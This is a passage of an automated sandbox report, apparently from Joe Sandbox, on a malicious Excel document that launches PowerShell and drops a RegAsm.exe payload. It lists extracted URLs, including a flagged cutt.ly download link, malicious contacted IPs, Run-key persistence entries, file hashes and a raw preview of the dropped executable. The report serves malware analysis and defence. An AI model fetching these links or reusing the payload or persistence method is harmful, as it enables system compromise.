                                            unknown
                                            http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.firmaprofesional.com0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://cutt.ly/powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.netlock.net/docspowershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpfalse
                                                high
                                                http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ocsp.entrust.net03powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.ibsensoftware.com/RegAsm.exefalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.acabogacia.org0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cutt.lypowershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ca.sia.it/seccli/repository/CPS0powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.securetrust.com/SGCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl.securetrust.com/STCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cutt.ly/qjdJoz4PEpowershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.icra.org/vocabulary/.powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.e-szigno.hu/RootCA.crt0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.quovadisglobal.com/cps0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://investor.msn.com/powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.valicert.com/1powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.e-szigno.hu/SZSZ/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.%s.comPApowershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                low
                                                                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://ocsp.quovadisoffshore.com0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://cps.chambersign.org/cps/chambersignroot.html0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://cutt.ly/qjdJoz4powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://ca.sia.it/secsrv/repository/CRL.der0Jpowershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
83.172.144.37 | unknown | Netherlands | 25459 | NEDZONE-ASNL | true
104.22.0.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true
185.206.215.56 | unknown | Ukraine | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:336301
Start date:05.01.2021
Start time:19:04:25
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 12s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:6Cprm97UTl (renamed file extension from none to xls)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:21
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.expl.evad.winXLS@27/18@2/3
EGA Information:
• Successful, ratio: 71.4%
HDC Information:
• Successful, ratio: 31.4% (good quality ratio 30.5%)
• Quality average: 78.2%
• Quality standard deviation: 27.4%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
• Execution Graph export aborted for target RegAsm.exe, PID 2844 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 1324 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/336301/sample/6Cprm97UTl.xls

Simulations

Behavior and APIs

Time | Type | Description
19:04:41 | API Interceptor | 449x Sleep call for process: powershell.exe modified
19:05:09 | API Interceptor | 122x Sleep call for process: 12.exe modified
19:05:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jfdts C:\Users\user\ntrwe.exe
19:05:22 | API Interceptor | 98x Sleep call for process: ntrwe.exe modified
19:05:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jfdts C:\Users\user\ntrwe.exe
19:05:29 | API Interceptor | 779x Sleep call for process: RegAsm.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                104.22.0.232sample products trade reference.docxGet hashmaliciousBrowse
                                                                • cutt.ly/
                                                                Request_for_Quotation.xlsmGet hashmaliciousBrowse
                                                                • cutt.ly/gdvAeui

Domains

Columns: Associated Sample Name / URL | Detection | Context

Match: cutt.ly
  spetsifikatsiya.xls | malicious | 104.22.0.232
  1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls | malicious | 172.67.8.238
  spetsifikatsiya.xls | malicious | 104.22.1.232
  New Avinode Plans and Prices 2021.xls | malicious | 172.67.8.238
  spetsifikatsiya.xls | malicious | 104.22.0.232
  spetsifikatsiya.xls | malicious | 172.67.8.238
  AdviceSlip.xls | malicious | 104.22.0.232
  file.xls | malicious | 104.22.1.232
  file.xls | malicious | 172.67.8.238
  file.xls | malicious | 172.67.8.238
  output.xls | malicious | 172.67.8.238
  SecuriteInfo.com.Heur.20246.xls | malicious | 172.67.8.238
  SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls | malicious | 104.22.1.232
  SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls | malicious | 104.22.0.232
  30689741.xls | malicious | 172.67.8.238
  95773220855.xls | malicious | 104.22.1.232
  95773220855.xls | malicious | 172.67.8.238
  MT-000137.xls | malicious | 172.67.8.238
  95773220855.xls | malicious | 104.22.0.232
  MT-000137.xls | malicious | 104.22.1.232

ASN

Columns: Associated Sample Name / URL | Detection | Context

Match: NEDZONE-ASNL
  https://balenpersen.com/TO/financialcrimes@lvmpd.com | malicious | 83.172.131.9
  SecuriteInfo.com.Trojan.GenericKD.34438057.21356.doc | malicious | 83.172.180.164
  https://installatiebedrijfroosendaal.nl/ONWFP-gO_YnJ-5Yu/ACH/PaymentAdvice/En_us/Sales-Invoice | malicious | 83.172.144.29

Match: CLOUDFLARENETUS
  Audio_47720.wavv - - Copy.htm | malicious | 104.16.19.94
  Adjunto.doc | malicious | 104.27.144.251
  details.html | malicious | 104.16.126.175
  https://notification1.bubbleapps.io/version-test?debug_mode=true | malicious | 104.19.241.93
  NQN0244_012021.doc | malicious | 104.27.144.251
  sek750_2021.exe | malicious | 172.67.166.210
  4560 2021 UE_9893.doc | malicious | 104.18.61.59
  Stremio+4.4.120.exe | malicious | 104.16.135.12
  https://bitly.com/2XaL0Dp | malicious | 104.27.183.152
  lJV2MfkPFd.exe | malicious | 104.27.151.210
  DAT 2020_12_30.doc | malicious | 172.67.191.146
  https://f000.backblazeb2.com/file/url-data-web-storage-secured-56adbcsjhdcbjs/web-data-server-1uyhchduiahc/index.html | malicious | 104.18.55.96
  G6slMyq847.exe | malicious | 104.27.151.210
  https://f000.backblazeb2.com/file/url-data-web-storage-secured-56adbcsjhdcbjs/web-data-server-1uyhchduiahc/index.html | malicious | 104.16.18.94
  Scan-0767672.doc | malicious | 104.27.144.251
  http://quickneasyrecipes.co | malicious | 104.18.226.52
  Documento-2021.doc | malicious | 172.67.141.14
  #Ud83d#Udcdejsi12615.html | malicious | 104.16.18.94
  https://splendideventsllc.org/Banco/ | malicious | 104.18.82.87
  https://splendideventsllc.org/Banco/ | malicious | 104.18.207.19

Match: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
  http://d4a687ce4c.lazeruka.ru | malicious | 91.211.251.72
  New order.doc | malicious | 92.119.113.115
  Purchase order.doc | malicious | 92.119.113.115
  PO20-AE12-0023.doc | malicious | 92.119.113.140
  ES-MA-18-9 4130.doc | malicious | 92.119.113.140
  Order-list.doc | malicious | 92.119.113.140
  Launcher.exe | malicious | 185.92.148.230
  UXsGbxVc2I.rtf | malicious | 92.119.113.115
  Documents.doc | malicious | 92.119.113.115
  http://clcktut.work/public/8852102841203823 | malicious | 45.82.69.137
  Vlpuoe2JSz.exe | malicious | 45.147.197.185
  PI.xlsx | malicious | 45.147.197.185
  PO#181120_pdf.exe | malicious | 92.119.113.115
  http://sh1563741.a.had.su/Area-Cliente/informazioni/web/ | malicious | 45.147.197.180
  u4WV77ddWF.dll | malicious | 185.219.83.48
  k1mh5904.exe | malicious | 95.215.206.139
  VVV.exe | malicious | 178.159.43.35
  Internet download manager cracker (1).exe | malicious | 45.147.197.110
  http://www.google.com/url?q=http%3A%2F%2Fjonfriskics.com%2Flotterye&sa=D&sntz=1&usg=AFQjCNFU254PyrxnCIpYtaqc4jMuBkMlpg | malicious | 45.147.197.36
  http://prevuse.ru | malicious | 45.147.197.20

JA3 Fingerprints

Columns: Associated Sample Name / URL | Detection | Context

Match: 05af1f5ca1b87cc9cc9b25185115607d
  DAT 2020_12_30.doc | malicious | 104.22.0.232
  N.11389944 BS 05 gen 2021.doc | malicious | 104.22.0.232
  PSX7103491.doc | malicious | 104.22.0.232
  Beauftragung.doc | malicious | 104.22.0.232
  1I72L29IL3F.doc | malicious | 104.22.0.232
  Adjunto_2021.doc | malicious | 104.22.0.232
  #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc | malicious | 104.22.0.232
  Dok 0501 012021 Q_93291.doc | malicious | 104.22.0.232
  invoice.doc | malicious | 104.22.0.232
  spetsifikatsiya.xls | malicious | 104.22.0.232
  1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls | malicious | 104.22.0.232
  output.xls | malicious | 104.22.0.232
  output.xls | malicious | 104.22.0.232
  spetsifikatsiya.xls | malicious | 104.22.0.232
  New Avinode Plans and Prices 2021.xls | malicious | 104.22.0.232
  spetsifikatsiya.xls | malicious | 104.22.0.232
  Shipping Details DHL.xls | malicious | 104.22.0.232
  AdviceSlip.xls | malicious | 104.22.0.232
  PI 99-14.doc__.rtf | malicious | 104.22.0.232
  Archivo.doc | malicious | 104.22.0.232

Dropped Files

Columns: Associated Sample Name / URL | Detection

Match: C:\Users\user\AppData\Local\Temp\RegAsm.exe
  Payment_Confirmation_Slip.xlsx | malicious
  Overdue Invoice.xlsx | malicious
  Quotation.xlsx | malicious
  ENCLOSE ORDER LIST.xlsx | malicious
  PO INV 195167 & 195324.xlsx | malicious
  Bank letter.xlsx | malicious
  Quotation.xlsx | malicious
  PO 19030004.xlsx | malicious
  New PO PO20.xlsx | malicious
  ORDER LIST.xlsx | malicious
  RFQ 00112.xlsx | malicious
  inquiry.xlsx | malicious

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: Microsoft Cabinet archive data, 58936 bytes, 1 file
  Category: dropped
  Size (bytes): 58936
  Entropy (8bit): 7.994797855729196
  Encrypted: true
  SSDEEP: 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
  MD5: E4F1E21910443409E81E5B55DC8DE774
  SHA1: EC0885660BD216D0CDD5E6762B2F595376995BD0
  SHA-256: CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
  SHA-512: 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
  Malicious: false
  Reputation: high, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Category: dropped
  Size (bytes): 326
  Entropy (8bit): 3.1086014193077407
  Encrypted: false
  SSDEEP: 6:kKlawwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:N1kPlE99SNxAhUegeT2
  MD5: 89A188366EFFB46949AD9093EDA55CF1
  SHA1: 6F3931CD5BA324C598AE0B45F7A1EA387E7DD1F2
  SHA-256: 9FBCA6A1EEDBC56E0350C4D21F36077F429AE6452F579A3864D44D11AD49A909
  SHA-512: F964D8C36C44119D49191DD1CD2D990D8EE87FC5EEDB9042CD8839100CCDA240ECC054FE1172A8E487569D4EFC5DDE439A2234E992DB0373AE34AD88FE98411E
  Malicious: false
C:\Users\user\AppData\Local\Temp\05DE0000
  Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  File Type: data
  Category: dropped
  Size (bytes): 105034
  Entropy (8bit): 7.925151112906241
  Encrypted: false
  SSDEEP: 3072:nda1iLoxgaSNUPZlsaFPOHYiR+rJEgjjajH7cA:nGiE/SN0ZltFPgY9rvgp
  MD5: 2A97A372C7AC14DDAF2BC6CECA6BCDE8
  SHA1: 6509EB9A038444C7CD44BF03B7B6536CCEBB73F0
  SHA-256: DBC762A96077FDB3858F84F2642813C5CAA88A1B41FFEB34C1FD5BAB9F6F2D9D
  SHA-512: 0EC40FBAB270674794C191A66EAC1FD609D9D264EE7A835B34F61A63ABA2687E2E8B83B23FD83C409050C6072473F7AFEC4FB521CD327D2F00DD9A42531B3A45
  Malicious: false
C:\Users\user\AppData\Local\Temp\Cab8018.tmp
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: Microsoft Cabinet archive data, 58936 bytes, 1 file
  Category: dropped
  Size (bytes): 58936
  Entropy (8bit): 7.994797855729196
  Encrypted: true
  SSDEEP: 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
  MD5: E4F1E21910443409E81E5B55DC8DE774
  SHA1: EC0885660BD216D0CDD5E6762B2F595376995BD0
  SHA-256: CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
  SHA-512: 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
  Malicious: false
C:\Users\user\AppData\Local\Temp\RegAsm.exe
  Process: C:\Users\user\ntrwe.exe
  File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
  Category: dropped
  Size (bytes): 64672
  Entropy (8bit): 6.033474133573561
  Encrypted: false
  SSDEEP: 768:PedoViadPL1DI9WzutSjeJan8dBhF541kE6Iq8HaVxlYDKz4yqibwEBbr:XiaFJkobMa8dBXG2zbVUDKz4yq3EBbr
  MD5: ADF76F395D5A0ECBBF005390B73C3FD2
  SHA1: 017801B7EBD2CC0E1151EEBEC14630DBAEE48229
  SHA-256: 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
  SHA-512: 9670AC5A10719FA312336B790EAD713D78A9999DB236AD0841A32CD689559B9F5F8469E3AF93400F1BE5BAF2B3723574F16EA554C2AAF638734FFF806F18DB2B
  Malicious: true
  Antivirus:
  • Antivirus: Metadefender, Detection: 0%
  • Antivirus: ReversingLabs, Detection: 0%
  Joe Sandbox View:
  • Filename: Payment_Confirmation_Slip.xlsx, Detection: malicious
  • Filename: Overdue Invoice.xlsx, Detection: malicious
  • Filename: Quotation.xlsx, Detection: malicious
  • Filename: ENCLOSE ORDER LIST.xlsx, Detection: malicious
  • Filename: PO INV 195167 & 195324.xlsx, Detection: malicious
  • Filename: Bank letter.xlsx, Detection: malicious
  • Filename: Quotation.xlsx, Detection: malicious
  • Filename: PO 19030004.xlsx, Detection: malicious
  • Filename: New PO PO20.xlsx, Detection: malicious
  • Filename: ORDER LIST.xlsx, Detection: malicious
  • Filename: RFQ 00112.xlsx, Detection: malicious
  • Filename: inquiry.xlsx, Detection: malicious
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.W..............0.................. ........@.. ....................... ......k.....`.....................................O.......8................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H........A..`p...........................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.;...}S......i.>...}T......i.>...}U.....+m...(....o......r]..p.o ...,..{T.......{U........o!....+(.ra..p.o ...,..{T.......
                                                                                        C:\Users\user\AppData\Local\Temp\Tar8019.tmp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):152533
                                                                                        Entropy (8bit):6.31602258454967
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                        Malicious:false
                                                                                        Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                        C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview: 1
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):35006
                                                                                        Entropy (8bit):0.6024827961083986
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeR:i
                                                                                        MD5:AD0D2FB7F4EC355D0D8CBF5C9235259B
                                                                                        SHA1:C875BB3B2020FB4A1C8E6E694BA2296EBB31DF81
                                                                                        SHA-256:2598083577FF245674401A33AE940D5AE389E972B1DBB147FAA47B40156D965E
                                                                                        SHA-512:E345C2920A6F29AE14EA6181178E3F4252B20CFF01374BA47CB7A4EE80FFA749E424345D9AB03905A8818E6DE1A03917499C409DBB6DAA1D3EB3340C4AA68E9E
                                                                                        Malicious:false
                                                                                        Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\6Cprm97UTl.LNK
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 6 02:04:31 2021, mtime=Wed Jan 6 02:04:39 2021, atime=Wed Jan 6 02:04:40 2021, length=127488, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2028
                                                                                        Entropy (8bit):4.547448419157985
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:8hz//o/XTr6N47KevRDv3qpdM7dD2hz//o/XTr6N47KevRDv3qpdM7dV:8hz/A/XT+NhtpQh2hz/A/XT+NhtpQ/
                                                                                        MD5:73C3A39789CB2C2692EF7B7D1BE021AF
                                                                                        SHA1:9B6DCC9611BABA41FE6CC83D220EEEA88E69B346
